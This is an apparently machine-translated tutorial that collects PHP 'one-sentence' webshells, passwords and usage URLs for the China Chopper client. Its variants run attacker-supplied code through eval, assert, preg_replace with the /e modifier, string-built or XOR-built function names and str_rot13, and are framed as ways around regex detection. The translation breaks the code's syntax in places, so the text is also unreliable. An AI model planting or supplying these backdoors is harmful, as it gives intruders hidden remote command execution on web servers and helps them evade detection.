One sentence for the php we chased in those years: Analysis Principle
One sentence for php that we chased in those years
I. eval
Eval usage:
The eval () function calculates the string according to the PHP code.
The string must be a valid PHP code and must end with a semicolon.
If the return statement is not called in the code string, NULL is returned. If a parsing error exists in the Code, the eval () function returns false.
1 <? Phpeval ($ _ POST [password]);?>
Ii. assert
Assert usage:
The assert function is used in php to determine whether an expression is true. Returns true or false;
This is similar to eval. However, eval ($ code_str) Only executes php encoding, but the usage of assert is more detailed.
Assert_option () can be used to restrict and control assert ().
Default Value:
1 2 3 4 5 ASSERT_ACTIVE = 1 // Assert function switch ASSERT_WARNING = 1 // if the expression is false, whether to output warning error messages, issue a PHP warning for each failed assertion ASSERT_BAIL = 0 // whether to stop running; terminate execution on failed assertions ASSERT_QUIET_EVAL = 0 // whether to disable the error message when executing the expression; disable error_reporting during assertion expression evaluation ASSERT_CALLBACK = (NULL) // whether to enable the callback function user function to call on failed assertions
You can use the above method to modify the assert backdoor to bypass the regular expression:
1 <? Phpassert ($ _ POST [password]);?>
3. modify a sentence:
1 <? Php $ _ GET ['xxoo '] ($ _ POST ['cmd']);?>
The client uses a kitchen knife, the password is cmd, And the url is test. php? Xxoo = assert
1 <? Php $ _ POST ['xxoo '] ($ _ POST ['cmd']);?>
This is OK when the post packet is sent directly.
1 2 3 4 5 6 7 <? Php $ a = "". "s ". "s ". "e ". "r ". "t"; $ a ($ _ POST ["cmd"]);?>
1 <? Php ($ _ = @ $ _ GET [password]). @ $ _ ($ _ POST [xxoo])?>
Usage: http: // localhost/password. php? Password = asstrt
The principle is that get passes the assert parameter and then forms @ asserT @ ($ _ POST [xxoo]).
1 <? Php $ _ POST ['Password'] ($ _ POST ['cmd']);?
Submit post content to form assert and eval.
4. Replace with str_replace
$ A = str_replace (x, "," axsxxsxexrxxt ")
The final form is $ a = assert.
5.
1 2 3 <? Php @ preg_replace ("/[email]/e", $ _ POST ['H'], "error");?>
Let's talk about this backdoor. It uses the e modifier. You only need to match the location of e with the final "error" Regular Expression to get the content of $ _ POST ['H.
Then we only need to use the kitchen knife <O> h = @ assert ($ _ POST [c]); </O> to execute the h parameter.
6.
1 2 3 4 5 6 7 <? Php $ _ = ""; $ _ [+ ""] = ''; $ _ =" $ _". ""; $ _ = ($ _ [+ ""] | ""). ($ _ [+ ""] | ""). ($ _ [+ ""] ^ "");?> <? Php $ {'_'. $ _} ['_'] ($ {'_'. $ _} ['_']);?>
Write: http: // localhost/2.php? _ = Assert & __= eval ($ _ POST ['xxoo '])
Password: xxoo
For Principle Analysis, you only need to print $.
7.
1 2 3 <? Php ($ b4dboy =$ _ POST ['1']) & @ preg_replace ('/ad/e ,,'@,. str_rot13 ('riny ,)., ($ b4dboy) ', 'add');?>
'@'. Str_rot13 ('riny') is equivalent to @ eval, and then you know.
In fact, the principle of the majority of data is like this. After the parsing, the original statements are still eval and assert.